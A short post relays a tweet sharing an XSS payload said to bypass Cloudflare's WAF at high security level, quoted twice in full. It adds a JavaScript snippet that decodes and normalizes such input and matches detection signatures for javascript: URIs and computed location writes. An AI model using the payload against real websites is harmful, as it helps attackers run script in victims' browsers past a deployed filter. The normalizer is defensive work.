A tweet shared an XSS payload that bypasses the Cloudflare WAF, specifically when the security level is set to high. The payload is: javascript:window/*Ata*/[%27loc%27%2b%27ati%27%2b%27on%27]%3d%27java%27%2b%27scr%27%2b%27ipt:%27%2blocation/*#*/;alert(origin). More details can be found in the tweet: https://t.co/D0JWiCMBex
XSS WAF BYPASS PAYLOADS
CloudFlare WAF (when security level high): javascript:window/*Ata*/[%27loc%27%2b%27ati%27%2b%27on%27]%3d%27java%27%2b%27scr%27%2b%27ipt:%27%2blocation/*#*/;alert(origin) pic.twitter.com/D0JWiCMBex
— nader abdi (@AtaTurk1925) June 17, 2024
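
A defensive sketch, added here and not taken from the tweet or from Cloudflare: it percent-decodes the quoted payload, strips block comments and folds string-literal concatenation, so that the computed location assignment becomes visible to a pattern match. The function names and the signature list are assumptions made for illustration.

```javascript
// Added example: normalize input before signature matching.
// SAMPLE is the payload string quoted on this page, unchanged.
const SAMPLE = "javascript:window/*Ata*/[%27loc%27%2b%27ati%27%2b%27on%27]%3d%27java%27%2b%27scr%27%2b%27ipt:%27%2blocation/*#*/;alert(origin)";

function safeDecode(s) {
  // Malformed percent sequences throw URIError; keep the input as-is then.
  try { return decodeURIComponent(s); } catch (_) { return s; }
}

function normalize(input) {
  let s = input;
  // Percent-decode until stable (bounded, to handle double encoding).
  for (let i = 0; i < 3; i++) {
    const d = safeDecode(s);
    if (d === s) break;
    s = d;
  }
  // Drop /* ... */ comments, which are ignored by the JavaScript parser.
  s = s.replace(/\/\*[\s\S]*?\*\//g, "");
  // Fold 'a'+'b' into 'ab' until no adjacent literals remain.
  let prev;
  do {
    prev = s;
    s = s.replace(/(['"`])([^'"`\\]*)\1\s*\+\s*(['"`])([^'"`\\]*)\3/g, "'$2$4'");
  } while (s !== prev);
  return s;
}

// Hypothetical signature set, for illustration only.
const SIGNATURES = [
  { name: "javascript-uri", re: /javascript\s*:/i },
  { name: "computed-location-write", re: /\[\s*['"`]location['"`]\s*\]\s*=/i },
  { name: "dialog-call", re: /\b(alert|confirm|prompt)\s*\(/i },
];

// Report which signatures match the raw input and which match after normalization.
function inspect(input) {
  const normalized = normalize(input);
  const hits = (s) => SIGNATURES.filter((x) => x.re.test(s)).map((x) => x.name);
  return { normalized, rawHits: hits(input), normalizedHits: hits(normalized) };
}

console.log(inspect(SAMPLE));
```

The computed-location-write signature matches only the normalized form, which is the difference between inspecting the bytes on the wire and inspecting what the script engine will evaluate.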